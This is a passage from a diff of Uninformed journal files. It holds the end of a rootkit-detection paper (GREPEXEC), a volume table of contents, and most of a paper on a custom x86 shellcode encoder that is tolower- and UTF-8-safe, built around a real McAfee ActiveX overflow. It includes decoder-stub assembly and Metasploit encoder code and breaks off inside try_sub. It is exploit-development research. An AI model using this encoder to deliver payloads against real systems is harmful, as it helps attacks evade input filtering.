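    page[18] = 3;                         /* block 1: BlockSize = 3 units */
    memcpy(page + 24, &sig, sizeof(sig)); /* signature inside block 1 */
    return page;
}
```

The real scanner does the same thing per locked page, except the compare target is the OBJECT_HEADER->Type pointer and each candidate is then passed through the pool block validation.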
The following is the function which sets up the parameters in order to
perform the pool enumeration and validation of a block by a single PVOID
signature. On a match, a callback is made using the pointer to the start
of the matching block. As an alternative to the PVOID signature, the
poolgrep.c code can easily be modified to accept either a structure
describing several signatures and offsets or a validation function
pointer in order to perform a more complex signature validation.
NTSTATUS ScanPoolForExecutiveObjectByType (
IN PVOID Object,
IN FOUND_BLOCK_CB Callback,
IN PVOID CallbackContext
) {
NTSTATUS ntStatus = STATUS_SUCCESS;
POBJECT_HEADER pObjHdr;
PPOOL_HEADER pPoolHdr;
ULONG_PTR blockSigOffset;
ULONG_PTR blockSignature;
pObjHdr = OBJECT_TO_OBJECT_HEADER( Object );
pPoolHdr = OBJHDR_TO_POOL_HEADER( pObjHdr );
blockSigOffset = (ULONG_PTR)&pObjHdr->Type - (ULONG_PTR)pObjHdr
+ OBJHDR_TO_POOL_BLOCK_OFFSET(pObjHdr);
blockSignature = (ULONG_PTR)pObjHdr->Type;
(VOID)ScanPoolForBlockBySignature( pPoolHdr->PoolType - 1,
0, // pPoolHdr->PoolTag OPTIONAL,
blockSigOffset,
blockSignature,
Callback,
CallbackContext );
return ntStatus;
}
7.2) Usage
GrepExec usage is pretty straightforward. Here is the output of the
help command.
**********************************************************
GREPEXEC 0.1 * Grepping executive objects from the pool *
Author: bugcheck
Built on: May 30 2006
**********************************************************
Usage: grepexec.exe [options]
--help, -h Displays this information
--install, -i Manually install driver
--uninstall, -u Manually uninstall driver
--status, -s Display installation status
--process, -p GREP process objects
--thread, -t GREP thread objects
--driver, -d GREP driver objects
--device, -e GREP device objects
7.3) Sample Output
The standard output is also straightforward. Here is a sample of each
supported command.
C:\grepexec>grepexec.exe -p
EPROCESS=81736C88 CID=0354 NAME: svchost.exe
EPROCESS=8174E238 CID=0634 NAME: explorer.exe
EPROCESS=81792020 CID=027c NAME: winlogon.exe
...
C:\grepexec>grepexec.exe -t
EPROCESS=817993C0 ETHREAD=815D4A58 CID=0778.077c wscntfy.exe
EPROCESS=8174AA88 ETHREAD=815D6860 CID=0408.0678 svchost.exe
EPROCESS=819CA830 ETHREAD=815F3B30 CID=0004.0368 System
EPROCESS=81792020 ETHREAD=81600398 CID=027c.0460 winlogon.exe
...
C:\grepexec>grepexec.exe -d
DRIVER=81722DA0 BASE=F9B5C000 \FileSystem\NetBIOS
DRIVER=819A4B50 BASE=F983D000 \Driver\Ftdisk
DRIVER=81725DA0 BASE=00000000 \Driver\Win32k
DRIVER=81771880 BASE=F9EB4000 \Driver\Beep
...
C:\grepexec>grepexec.exe -e
DEVICE=81733860 \Driver\IpNat NAME: IPNAT
DEVICE=81738958 \Driver\Tcpip NAME: Udp
DEVICE=817394B8 \Driver\Tcpip NAME: RawIp
DEVICE=81637CE0 \FileSystem\Srv NAME: LanmanServer
...
8) Conclusion
From reading this paper the reader should have a good understanding of
the concepts and issues related to scanning memory for signatures in
order to detect objects in the system pool. The reader should be able
to enumerate system memory safely, construct their own customized memory
signatures, locate signatures in memory, and implement their own
reporting mechanism.
It is obvious that object detection using memory scanning is no exact
science. However, it does provide a method which, for the most part,
interacts with the system as little as possible. The
author believes that the outlined technique can be successfully
implemented to obtain acceptable results in detecting objects hidden by
rootkits.
Bibliography
Blackhat.com. RAIDE: Rootkit Analysis Identification Elimination.
http://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-Silberman-Butler.pdf;
Accessed May 30, 2006.
F-Secure. Blacklight.
http://www.f-secure.com/blacklight/;
Accessed May 30, 2006.
Invisiblethings.org. MODGREPPER.
http://www.invisiblethings.org/tools.html;
Accessed May 30, 2006.
Phrack.org. Shadow Walker.
http://www.phrack.org/phrack/63/p63-0x08_Raising_The_Bar_For_Windows_Rootkit_Detection.txt;
Accessed May 30, 2006.
Rootkit.com. FU.
http://rootkit.com/project.php?id=12;
Accessed May 30, 2006.
Rootkit.com. Please don't greap me!.
http://rootkit.com/newsread.php?newsid=316;
Accessed May 30, 2006.
Uninformed.org. FUTo.
http://uninformed.org/?v=3&a=7&t=sumry;
Accessed May 30, 2006.
Windows Hardware Developer Central. Debugging Tools for Windows.
http://www.microsoft.com/whdc/devtools/debugging/default.mspx;
Accessed May 30, 2006.

2070
uninformed/4.8.txt Normal file

File diff suppressed because it is too large Load Diff

30
uninformed/4.txt Normal file
View File

@ -0,0 +1,30 @@
Engineering in Reverse
Improving Automated Analysis of Windows x64 Binaries
skape
As Windows x64 becomes a more prominent platform, it will become necessary to develop techniques that improve the binary analysis process. In particular, automated techniques that can be performed prior to doing code or data flow analysis can be useful in getting a better understanding for how a binary operates. To that point, this paper gives a brief explanation of some of the changes that have been made to support Windows x64 binaries. From there, a few basic techniques are illustrated that can be used to improve the process of identifying functions, annotating their stack frames, and describing their exception handler relationships. Source code to an example IDA plugin is also included that shows how these techniques can be implemented.
txt | code.tgz | pdf | html
Exploitation Technology
Exploiting the Otherwise Non-Exploitable on Windows
Skywing & skape
This paper describes a technique that can be applied in certain situations to gain arbitrary code execution through software bugs that would not otherwise be exploitable, such as NULL pointer dereferences. To facilitate this, an attacker gains control of the top-level unhandled exception filter for a process in an indirect fashion. While there has been previous work illustrating the usefulness in gaining control of the top-level unhandled exception filter, Microsoft has taken steps in XPSP2 and beyond, such as function pointer encoding, to prevent attackers from being able to overwrite and control the unhandled exception filter directly. While this security enhancement is a marked improvement, it is still possible for an attacker to gain control of the top-level unhandled exception filter by taking advantage of a design flaw in the way unhandled exception filters are chained. This approach, however, is limited by an attacker's ability to control the chaining of unhandled exception filters, such as through the loading and unloading of DLLs. This does reduce the global impact of this approach; however, there are some interesting cases where it can be immediately applied, such as with Internet Explorer.
General Research
Abusing Mach on Mac OS X
nemo
This paper discusses the security implications of Mach being integrated with the Mac OS X kernel. A few examples are used to illustrate how Mach support can be used to bypass some of the BSD security features, such as securelevel. Furthermore, examples are given that show how Mach functions can be used to supplement the limited ptrace functionality included in Mac OS X.
Rootkit Technology
GREPEXEC: Grepping Executive Objects from Pool Memory
bugcheck
As rootkits continue to evolve and become more advanced, methods that can be used to detect hidden objects must also evolve. For example, relying on system provided APIs to enumerate maintained lists is no longer enough to provide effective cross-view detection. To that point, scanning virtual memory for object signatures has been shown to provide useful, but limited, results. The following paper outlines the theory and practice behind scanning memory for hidden objects. This method relies upon the ability to safely reference the Windows system virtual address space and also depends upon building and locating effective memory signatures. Using this method as a base, suggestions are made as to what actions might be performed once objects are detected. The paper also provides a simple example of how object-independent signatures can be built and used to detect several different kernel objects on all versions of Windows NT+. Due to time constraints, the source code associated with this paper will be made publicly available in the near future.
What Were They Thinking?
Anti-Virus Software Gone Wrong
Skywing
Anti-virus software is becoming more and more prevalent on end-user computers today. Many major computer vendors (such as Dell) bundle anti-virus software and other personal security suites in the default configuration of newly-sold computer systems. As a result, it is becoming increasingly important that anti-virus software be well-designed, secure by default, and interoperable with third-party applications. Software that is installed and running by default constitutes a prime target for attack and, as such, it is especially important that said software be designed with security and interoperability in mind. In particular, this article provides examples of issues found in well-known anti-virus products. These issues range from not properly validating input from an untrusted source (especially within the context of a kernel driver) to failing to conform to API contracts when hooking or implementing an intermediary between applications and the underlying APIs upon which they rely. For popular software, or software that is installed by default, errors of this sort can become a serious problem to both system stability and security. Beyond that, it can impact the ability of independent software vendors to deploy functioning software on end-user systems.
Implementing a Custom X86 Encoder
Aug, 2006
skape
mmiller@hick.org
1) Foreword
Abstract: This paper describes the process of implementing a custom
encoder for the x86 architecture. To help set the stage, the McAfee
Subscription Manager ActiveX control vulnerability, which was discovered
by eEye, will be used as an example of a vulnerability that requires the
implementation of a custom encoder. In particular, this vulnerability
does not permit the use of uppercase characters. To help make things
more interesting, the encoder described in this paper will also avoid
all characters above 0x7f. This will make the encoder both UTF-8 safe
and tolower safe.
Challenge: The author believes that a UTF-8 safe and tolower safe
encoder could most likely be implemented in a much more optimized
fashion that incurs far less overhead in terms of size. If any reader
has ideas about ways in which this might be approached, feel free to
contact the author. A bonus challenge would be to identify a geteip
technique that can be used with these character limitations.
2) Introduction
In the month of August, eEye released an advisory for a stack-based
buffer overflow that was found in the McAfee Subscription Manager
ActiveX control. The underlying vulnerability was in an insecure call
to vsprintf that was exposed through scripting-accessible routines. At a
glance, this vulnerability would appear trivial to exploit given that
it's a very basic stack overflow. However, once it comes to
transmitting a payload, or even a particular return address, certain
limiting factors begin to appear. The focus of this paper will center
around an exercise in implementing a custom encoder to overcome certain
character set limitations. The McAfee Subscription Manager vulnerability
will be used as a real-world example of a vulnerability that requires a
custom encoder to exploit.
When it comes to exploiting this vulnerability, the first step is to
reproduce the conditions reported in the advisory. Like most
vulnerabilities, it's customary to send an arbitrary sequence of bytes,
such as A's. However, in this particular exploit, sending a sequence of
A's, which equates to 0x41, actually causes the return address to be
overwritten with 0x61's which are lowercase a's. Judging from this, it
seems obvious that the input string is undergoing a tolower operation
and it will not be possible for the payload or return address to contain
any uppercase characters.
Given these character restrictions, it's safe to go forward with writing
the exploit. To simply get a proof of concept for code execution, it
makes sense to put a series of int3's, represented by the 0xcc opcode,
immediately following the return address. The return address could then
be pointed to the location of a push esp / ret or some other type of
instruction that transfers control to where the series of int3's should
reside. Once the vulnerability is triggered, the debugger should break
in at an int3 instruction, but that's not actually what happens.
Instead, it breaks in on a completely different instruction:
(4f8.58c): Unknown exception - code c0000096 (!!! second chance !!!)
eax=00000f19 ebx=00000000 ecx=00139438
edx=0013a384 esi=00001b58 edi=0013a080
eip=0013a02c esp=0013a02c ebp=36213365 iopl=0
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
0013a02c ec in al,dx
0:000> u eip
0013a02c ec in al,dx
0013a02d ec in al,dx
0013a02e ec in al,dx
0013a02f ec in al,dx
Again, it looks like the buffer is undergoing some sort of transformation. One
quick thing to notice is that 0xcc + 0x20 = 0xec. This is similar to what
would happen when changing an uppercase character to a lowercase character,
such as where 'A', or 0x41, is converted to 'a', or 0x61, by adding 0x20. It
appears that the operation that's performing the case lowering may also be
inadvertently performing it on a specific high ASCII range.
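As a quick sanity check, the lowering behavior observed in the debugger can be modeled in a few lines of Ruby. This is an illustrative approximation of LCMAP_LOWERCASE over the Latin-1 range, not the exact LCMapStringW tables:

```ruby
# Approximate model of the case-lowering seen above: bytes in the
# uppercase ASCII range, and in the accented Latin-1 range 0xC0-0xDE
# (excluding the multiply sign 0xD7), are lowered by adding 0x20,
# just as 'A' (0x41) becomes 'a' (0x61).
def lower_byte(b)
  if (0x41..0x5A).cover?(b) || ((0xC0..0xDE).cover?(b) && b != 0xD7)
    b + 0x20
  else
    b
  end
end

lower_byte(0x41)  # 'A' -> 0x61 ('a')
lower_byte(0xCC)  # int3 byte -> 0xEC (the "in al,dx" opcode seen above)
```

Under this model, the 0xcc int3 bytes come out as 0xec, exactly matching the disassembly shown above.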
What's actually occurring is that the subscription manager control is calling
_mbslwr, using the statically linked CRT, on a copy of the original input
string. Internally, _mbslwr calls into __crtLCMapStringA. Eventually this will
lead to a call out to kernel32!LCMapStringW. The second parameter to this
routine is dwMapFlags which describes what sort of transformations, if any,
should be performed on the buffer. The _mbslwr routine passes 0x100, or
LCMAP_LOWERCASE. This is what results in the lowering of the string.
So, given this information, it can be determined that it will not be possible
to use characters from 0x41 through 0x5A inclusive, nor, for similar reasons,
characters from 0xc0 through 0xe0. In actuality, not all of the characters in this
range are bad. The main reason this ends up causing problems is because many
of the payload encoders out there for x86, including those in Metasploit, rely
on characters from these two sets for their decoder stub and subsequent encoded
data. For that reason, and for the challenge, it's worth pursuing the
implementation of a custom encoder.
While this particular vulnerability will permit the use of many characters
above 0x80, it makes the challenge that much more interesting, and particularly
useful, to limit the usable character set to the characters described below.
The reason this range is more useful is because the characters are UTF-8 safe
and also tolower safe. Like most good payloads, the encoder will also avoid
NULL bytes.
0x01 -> 0x40
0x5B -> 0x7f
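For reference, the usable character set can be expressed as a simple predicate. This is just a restatement of the two ranges listed above in code form:

```ruby
# The encoder's usable byte values: below 0x80 (UTF-8 safe), never NULL,
# and outside the uppercase range 0x41-0x5A that the tolower pass rewrites.
def valid_char?(b)
  (0x01..0x40).cover?(b) || (0x5B..0x7F).cover?(b)
end

# The full set of usable bytes.
VALID_SET = (0x00..0xFF).select { |b| valid_char?(b) }
```

This leaves 101 of the 256 possible byte values available to the decoder stub and the encoded data.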
As with all encoded formats, there are actually two major pieces involved. The
first part is the encoder itself. The encoder is responsible for taking a raw
buffer and encoding it into the appropriate format. The second part is the
decoder, which, as is probably obvious, takes the encoded form and converts it
back into the raw form so that it can be executed as a payload. The
implementation of these two pieces will be described in the following chapters.
3) Implementing the Decoder
The implementation of the decoder involves taking the encoded form and
converting it back into the raw form. This must all be done using assembly
instructions that will execute natively on the target machine after an exploit
has succeeded and it must also use only those instructions that fall within the
valid character set. To accomplish this, it makes sense to figure out what
instructions are available out of the valid character set. To do that, it's as
simple as generating all of the permutations of the valid characters in both
the first and second byte positions. This provides a pretty good idea of what's
available. The end-result of such a process is a list of about 105 unique
instructions (independent of operand types). Of those instructions the most
interesting are listed below:
add
sub
imul
inc
cmp
jcc
pusha
push
pop
and
or
xor
Some very useful instructions are available, such as add, xor, push, pop, and a
few jcc's. While there's an obvious lack of the traditional mov instruction,
it can be made up for through a series of push and pop instructions, if needed.
With the set of valid instructions identified, it's possible to begin
implementing the decoder. Most decoders will involve three implementation
phases. The first phase is used to determine the base address of the decoder
stub using a geteip technique. Following that, the encoded data must be
transformed from its character-safe form to the form that it will actually
execute from. Finally, the decoder must transfer control into the decoded data
so that the actual payload can begin executing. These three steps will be
described in the following sections.
In order to better understand the following sections, it's important to
describe the general approach that is going to be taken to implement the
decoder. The stub header is used to prepare the necessary state for the decode
transforms. The transforms themselves take the encoded data, as a series of
four byte blocks, and translate it using the process described later in this chapter.
Finally, execution falls through to the decoded data that is stored in place of
the encoded data.
3.1) Determining the Stub's Base Address
The first step in most decoder stubs will require the use of a series of
instructions, also referred to as geteip code, that obtain the location of the
current instruction pointer. The reason this is necessary is because most
decoders will have the encoded data placed immediately following the decoder
stub in memory. In order to operate on the encoded data using an absolute
address, it is necessary to determine where the data is at. If the decoder
stub can determine the address that it's executing from, then it can determine
the address of the encoded data immediately following it in memory in a
position-independent fashion. As one might expect, the character limitations of
this challenge make it quite a bit harder to get the value of the current
instruction pointer.
There are a number of different techniques that can be used to get the value of
the instruction pointer on x86. However, the majority of these techniques rely
on the use of the call instruction. The problem with the use of the call
instruction is that it is generally composed of a high ASCII byte, such as 0xe8
or 0xff. Another technique that can be used to get the instruction pointer is
the fnstenv FPU instruction. Unfortunately, this instruction is also composed
of bytes in the high ASCII range, such as 0xd9. Yet another approach is to use
structured exception handling to get the instruction pointer. This is
accomplished by registering an exception handler and extracting the Eip value
from the CONTEXT structure when an exception is generated. In fact, this
approach has even been implemented in entirely alphanumeric form for Windows by
SkyLined. Unfortunately, it can't be used in this case because it relies on
uppercase characters.
With all of the known geteip techniques unusable, it seems like some
alternative method for getting the base address of the decoder stub will be
needed. In the world of alphanumeric encoders, such as SkyLined's Alpha2, it
is common for the decoder stub to assume that a certain register contains the
base address of the decoder stub. This assumption makes the decoder more
complicated to use because it can't simply be dropped into any exploit and be
expected to work. Instead, exploits may need to be modified in order to ensure
that a register can be found that contains the location, or some location near,
the decoder stub.
At the time of this writing, the author is not aware of a geteip technique that
can be used that is both 7-bit safe and tolower safe. Like the alphanumeric
payloads, the decoder described in this paper will be implemented using a
register that is explicitly assumed to contain a reference to some address that
is near the base address of the decoder stub. For this document, the register
that is assumed to hold the address will be ecx, but it is equally possible to
use other registers.
For this particular decoder, determining the base address is just the first
step involved in implementing the stub's header. Once the base address has
been determined, the decoder must adjust the register that holds the base
address to point to the location of the encoded data. The reason this is
necessary is because the next step of the decoder, the transforms, depend on
knowing the location of the encoded data that they will be operating on. In
order to calculate this address, the decoder must add the size of the stub
header plus the size of all of the decode transforms to the register that
holds the base address. The end result should be that the register will hold
the address of the first encoded block.
The following disassembly shows one way that the stub header might be
implemented. In this disassembly, ecx is assumed to point at the beginning of
the stub header:
00000000 6A12 push byte +0x12
00000002 6B3C240B imul edi,[esp],byte +0xb
00000006 60 pusha
00000007 030C24 add ecx,[esp]
0000000A 6A19 push byte +0x19
0000000C 030C24 add ecx,[esp]
0000000F 6A04 push byte +0x4
The purpose of the first two instructions is to calculate the number of bytes
consumed by all of the decode transforms (which are described in the next section). It
accomplishes this by multiplying the size of each transform, which is 0xb
bytes, by the total number of transforms, which in this example is 0x12. The
result of the multiplication, 0xc6, is stored in edi. Since each transform is
capable of decoding four bytes of the raw payload, the maximum number of bytes
that can be encoded is 508 bytes. This shouldn't be seen as much of a limiting
factor, though, as other combinations of imul can be used to account for larger
payloads.
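The arithmetic behind the first two instructions is easy to double-check. The transform size (0xb bytes) and the transform count (0x12) are the values from the disassembly above; the 508-byte bound follows from the one-byte push immediate:

```ruby
# Each decode transform is 0xb bytes of code and decodes 4 raw bytes.
TRANSFORM_SIZE = 0x0b

# The value the imul leaves in edi for the example's 0x12 transforms.
transform_total = 0x12 * TRANSFORM_SIZE  # 0xc6, as stated in the text

# A one-byte "push byte" immediate caps the transform count at 0x7f,
# so at most 0x7f * 4 raw bytes can be encoded this way.
max_payload = 0x7f * 4                   # 508 bytes
```

As the text notes, the 508-byte cap is not fundamental; other imul operand combinations could account for larger payloads.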
Once the size of the decode transforms has been calculated, pusha is executed
in order to place the edi register at the top of the stack. With the value of
edi at the top of the stack, the value can be added to the base address
register ecx, thus accounting for the number of bytes used by the decode
transforms. The astute reader might ask why the value of edi is indirectly
added to ecx. Why not just add it directly? The answer, of course, is due to
bad characters:
00000000 01F9 add ecx,edi
It's also not possible to simply push edi onto the stack, because the push edi
instruction also contains bad characters:
00000000 57 push edi
Starting with the fifth instruction, the size of the stub header, plus any
other offsets that may need to be accounted for, are added to the base address
in order to shift the ecx register to point at the start of the encoded data.
This is accomplished by simply pushing the number of bytes to add onto the
stack and then adding them to the ecx register indirectly by adding through
[esp].
After these instructions are finished, ecx will point to the start of the
encoded data. The final instruction in the stub header is a push byte 0x4. This
instruction isn't actually used by the stub header, but it's there to set up
some necessary state that will be used by the decode transforms. Its use will
be described in the next section.
3.2) Transforming the Encoded Data
The most important part of any decoder is the way in which it transforms the
data from its encoded form to its actual form. For example, many of the
decoders used in the Metasploit Framework and elsewhere will xor a portion of
the encoded data with a key that results in the actual bytes of the original
payload being produced. While this is an effective way of obtaining the desired
results, it's not possible to use such a technique with the character set
limitations currently defined in this paper.
In order to transform encoded data back to its original form, it must be
possible to produce any byte from 0x00 to 0xff using any number of combinations
of bytes that fall within the valid character set. This means that this
decoder will be limited to using combinations of characters that fall within
0x01-0x40 and 0x5b-0x7f. To figure out the best possible means of
accomplishing the transformation, it makes sense to investigate each of the
useful instructions that were identified earlier in this chapter.
The bitwise instructions, such as and, or, and xor are not going to be
particularly useful to this decoder. The main reason for this is that they are
unable to produce values that reside outside of the valid character sets
without the aid of a bit shifting instruction. For example, it is impossible
to bitwise-and two non-zero values in the valid character set together to
produce 0x00. While xor could be used to accomplish this, that's about all that
it could do other than producing other values below the 0x80 boundary. These
restrictions make the bitwise instructions unusable.
The imul instruction could be useful in that it is possible to multiply two
characters from the valid character set together to produce values that reside
outside of the valid character set. For example, multiplying 0x02 by 0x7f
produces 0xfe. While this may have its uses, there are two remaining
instructions that are actually the most useful.
The add instruction can be used to produce almost all possible characters.
However, it's unable to produce a few specific values. For example, it's
impossible to add two valid characters together to produce 0x00. It is also
impossible to add two valid characters together to produce 0xff or 0x01.
While this limitation may make it appear that the add instruction is unusable,
its saving grace is the sub instruction.
Like the add instruction, the sub instruction is capable of producing almost
all possible characters. It is certainly capable of producing the values that
add cannot. For example, it can produce 0x00 by subtracting 0x02 from 0x02.
It can also produce 0xff by subtracting 0x03 from 0x02. Finally, 0x01 can be
produced by subtracting 0x02 from 0x03. However, like the add instruction,
there are also characters that the sub instruction cannot produce. These
characters include 0x7f, 0x80, and 0x81.
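This analysis can be confirmed by brute force over the valid character set. The following quick check (not part of the encoder itself) enumerates every add and sub pairing of valid bytes:

```ruby
# Brute-force the add/sub reachability claims: using only bytes from the
# valid set (0x01-0x40 and 0x5B-0x7F), which result bytes can never be
# produced by (a + b) & 0xff or by (y - x) & 0xff?
valid = (0x01..0x40).to_a + (0x5B..0x7F).to_a

sums  = valid.product(valid).map { |a, b| (a + b) & 0xFF }.uniq
diffs = valid.product(valid).map { |y, x| (y - x) & 0xFF }.uniq

add_unreachable = (0x00..0xFF).to_a - sums   # => [0x00, 0x01, 0xFF]
sub_unreachable = (0x00..0xFF).to_a - diffs  # => [0x7F, 0x80, 0x81]
```

The unreachable sets are exactly the ones identified above, and they are disjoint, which is what makes the add/sub combination viable.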
Given this analysis, it seems that using add and sub in combination is most
likely going to be the best choice when it comes to transforming encoded data
for this decoder. With the fundamental operations selected, the next step is
to attempt to implement the code that actually performs the transformation. In
most decoders, the transform will be accomplished through a loop that simply
performs the same operation on a pointer that is incremented by a set number of
bytes each iteration. This type of approach results in all of the encoded data
being decoded prior to executing it. Using this type of technique is a little
bit more complicated for this decoder, though, because it can't simply rely on
the use of a static key and it's also limited in terms of what instructions it
can use within the loop.
For these reasons, the author decided to go with an alternative technique for
the transformation portion of the decoder stub. Rather than using a loop that
iterates over the encoded data, the author chose to use a series of sequential
transformations where each block of the encoded data was decoded. This
technique has been used before in similar situations. One negative aspect of
using this approach over a loop-based approach is that it substantially
increases the size of the encoded payload. While this gives an idea of the
structure of the decoder, it doesn't give a concrete understanding of how it's
actually implemented. It's at this point that one must descend from the lofty
high-level. What better way to do this than diving right into the disassembly?
00000011 6830703C14 push dword 0x143c7030
00000016 5F pop edi
00000017 0139 add [ecx],edi
00000019 030C24 add ecx,[esp]
The form of each transform will look exactly like this one. What's actually
occurring is a four byte value is pushed onto the stack and then popped into
the edi register. This is done in place of a mov instruction because the mov
instruction contains invalid characters. Once the value is in the edi
register, it is either added to or subtracted from its respective encoded data
block. The result of the add or subtract is stored in place of the previously
encoded data. Once the transform has completed, it adds the value at the top
of the stack, which was set to 0x4 in the decoder stub header, to the register
that holds the pointer into the encoded data. This results in the pointer
moving on to the next encoded data block so that the subsequent transform will
operate on the correct block.
This simple process is all that's necessary to perform the transformations
using only valid characters. As mentioned above, one of the negative aspects
of this approach is that it does add quite a bit of overhead to the original
payload. For each four byte block, 11 bytes of overhead are added. The
approach is also limited by the fact that if there is ever a portion of the raw
payload that contains characters that add cannot handle, such as 0x00, and also
contains characters that sub cannot handle, such as 0x80, then it will not be
possible to encode it.
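Putting these numbers together, the size overhead can be estimated with a simple model. This sketch assumes the 0x11-byte stub header shown earlier; its result for an eight-byte payload matches the "final size 47" reported by msfencode at the end of this paper:

```ruby
# Size model for the encoded payload: a fixed stub header, plus an
# 11-byte decode transform and 4 bytes of encoded data per four-byte
# block of the raw payload.
STUB_HEADER_SIZE = 0x11  # assumed: the header shown in section 3.1

def encoded_size(raw_len)
  blocks = (raw_len + 3) / 4       # raw length aligned up to 4 bytes
  STUB_HEADER_SIZE + blocks * 11 + blocks * 4
end

encoded_size(8)  # => 47, i.e. nearly 5x overhead for a tiny payload
```

The relative overhead shrinks for realistic payload sizes but remains close to four bytes of output per byte of input.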
3.3) Transferring Control to the Decoded Data
Due to the way the decoder is structured, there is no need for it to include
code that directly transfers control to the decoded data. Since this decoder
does not use any sort of looping, execution control will simply fall through to
the decoded data after all of the transformations have completed.
4) Implementing the Encoder
The encoder portion is made up of code that runs on an attacker's machine prior
to exploiting a target. It converts the actual payload that will be executed
into the encoded format and then transmits the encoded form as the payload.
Once the target begins executing code, the decoder, as described in the previous chapter,
converts the encoded payload back into its raw form and then executes it.
For the purposes of this document, the client-side encoder was implemented in
the 3.0 version of the Metasploit Framework as an encoder module for x86. This
chapter will describe what was actually involved in implementing the encoder
module for the Metasploit Framework.
The very first step involved in implementing the encoder is to create the
appropriate file and set up the class so that it can be loaded into the
framework. This is accomplished by placing the encoder module's file in the
appropriate directory, which in this case is modules/encoders/x86. The name of
the module's file is important only in that the module's reference name is
derived from the filename. For example, this encoder can be referenced as
x86/avoid_utf8_tolower based on its filename. In this case, the module's
filename is avoid_utf8_tolower.rb. Once the file is created in the appropriate
location, the next step is to define the class and provide the framework with
the appropriate module information.
To define the class, it must be placed in the appropriate namespace that
reflects where it is at on the filesystem. In this case, the module is placed
in the Msf::Encoders::X86 namespace. The name of the class itself is not
important so long as it is unique within the namespace. When defining the
class, it is important that it inherit from the Msf::Encoder base class at some
level. This ensures that it implements all the required methods for an encoder
to function when the framework is interacting with it.
At this point, the class definition should look something like this:
require 'msf/core'
module Msf
module Encoders
module X86
class AvoidUtf8 < Msf::Encoder
end
end
end
end
With the class defined, the next step is to create a constructor and to pass
the appropriate module information down to the base class in the form of the
info hash. This hash contains information about the module, such as name,
version, authorship, and so on. For encoder modules, it also conveys
information about the type of encoder that's being implemented as well as
information specific to the encoder, like block size and key size. For this
module, the constructor might look something like this:
def initialize
super(
'Name' => 'Avoid UTF8/tolower',
'Version' => '$Revision: 1.3 $',
'Description' => 'UTF8 Safe, tolower Safe Encoder',
'Author' => 'skape',
'Arch' => ARCH_X86,
'License' => MSF_LICENSE,
'EncoderType' => Msf::Encoder::Type::NonUpperUtf8Safe,
'Decoder' =>
{
'KeySize' => 4,
'BlockSize' => 4,
})
end
With all of the boilerplate code out of the way, it's time to finally get into
implementing the actual encoder. When implementing encoder modules in the 3.0
version of the Metasploit Framework, there are a few key methods that can
be overridden by a derived class. These methods are described in detail in the
developer's guide, so an abbreviated explanation of only those useful to this
encoder will be given here. Each method will be explained in its own
individual section.
4.1) decoder_stub
First and foremost, the decoder_stub method gives an encoder module the
opportunity to dynamically generate a decoder stub. The framework's idea of
the decoder stub is equivalent to the stub header described in the previous
chapter. In this case, it must simply provide a buffer whose assembly will
set up a specific register to point to the start of the encoded data blocks,
as described earlier. The completed version of this method might look something like
this:
def decoder_stub(state)
len = ((state.buf.length + 3) & (~0x3)) / 4
off = (datastore['BufferOffset'] || 0).to_i
decoder =
"\x6a" + [len].pack('C') + # push len
"\x6b\x3c\x24\x0b" + # imul 0xb
"\x60" + # pusha
"\x03\x0c\x24" + # add ecx, [esp]
"\x6a" + [0x11+off].pack('C') + # push byte 0x11 + off
"\x03\x0c\x24" + # add ecx, [esp]
"\x6a\x04" # push byte 0x4
state.context = ''
return decoder
end
In this routine, the length of the raw buffer, as found through
state.buf.length, is aligned up to a four byte boundary and then divided by
four. Following that, an optional buffer offset is stored in the off local
variable. The purpose of the BufferOffset optional value is to allow exploits
to cause the encoder to account for extra size overhead in the ecx register
when doing its calculations. The decoder stub is then generated using the
calculated length and offset to produce the stub header. The stub header is
then returned to the caller.
4.2) encode_block
The next important method to override is the encode_block method. This method
is used by the framework to allow an encoder to encode a single block and
return the resultant encoded buffer. The size of each block is provided to the
framework through the encoder's information hash. For this particular encoder,
the block size is four bytes. The implementation of the encode_block routine is
as simple as trying to encode the block using either the add instruction or the
sub instruction. Which instruction is used will depend on the bytes in the
block that is being encoded.
def encode_block(state, block)
buf = try_add(state, block)
if (buf.nil?)
buf = try_sub(state, block)
end
if (buf.nil?)
raise BadcharError.new(state.encoded, 0, 0, 0)
end
buf
end
The first thing encode_block tries is add. The try_add method is implemented as
shown below:
def try_add(state, block)
buf = "\x68"
vbuf = ''
ctx = ''
block.each_byte { |b|
return nil if (b == 0xff or b == 0x01 or b == 0x00)
begin
xv = rand(b - 1) + 1
end while (is_badchar(state, xv) or is_badchar(state, b - xv))
vbuf += [xv].pack('C')
ctx += [b - xv].pack('C')
}
buf += vbuf + "\x5f\x01\x39\x03\x0c\x24"
state.context += ctx
return buf
end
The try_add routine enumerates each byte in the block, trying to find a random
byte that, when added to another random byte, produces the byte value in the
block. The algorithm it uses to accomplish this is to loop selecting a random
value between 1 and the actual value. From there a check is made to ensure
that both values are within the valid character set. If they are both valid,
then one of the values is stored as one of the bytes of the 32-bit immediate
operand to the push instruction that is part of the decode transform for the
current block. The second value is appended to the encoded block context.
After all bytes have been considered, the instructions that compose the decode
transform are completed and the encoded block context is appended to the string
of encoded blocks. Finally, the decode transform is returned to the framework.
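The effect of the add transform can be illustrated with a small round-trip sketch. The helper below is hypothetical and skips the badchar checks of the real try_add; note that byte-wise addition here is equivalent to the decoder's dword-wide add [ecx], edi, because each xv + (b - xv) pair sums to b < 0x100, so no carries cross byte boundaries:

```ruby
# Round-trip sketch of the add transform: split each raw byte b into
# xv (which would live in the transform's push imm32) and b - xv (which
# would be transmitted as encoded data), then "decode" by addition.
def add_round_trip(block, rng = Random.new(1234))
  imm = []   # bytes of the 32-bit immediate pushed by the transform
  enc = []   # bytes of the encoded data block
  block.each do |b|
    xv = rng.rand(1...b)   # assumes 0x02 <= b <= 0xFE, as in try_add
    imm << xv
    enc << b - xv
  end
  dec = enc.zip(imm).map { |e, k| (e + k) & 0xFF }
  [imm, enc, dec]
end

_, _, dec = add_round_trip([0x90, 0x90, 0xCC, 0x42])
dec  # => [0x90, 0x90, 0xCC, 0x42] -- the original block
```

The real routine additionally loops until both xv and b - xv land in the valid character set, failing over to try_sub when that is impossible.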
In the event that any of the bytes that compose the block being encoded by
try_add are 0x00, 0x01, or 0xff, the routine will return nil. When this
happens, the encode_block routine will attempt to encode the block using the sub
instruction. The implementation of the try_sub routine is shown below:
def try_sub(state, block)
buf = "\x68";
vbuf = ''
ctx = ''
carry = 0
block.each_byte { |b|
return nil if (b == 0x80 or b == 0x81 or b == 0x7f)
x = 0
y = 0
prev_carry = carry
begin
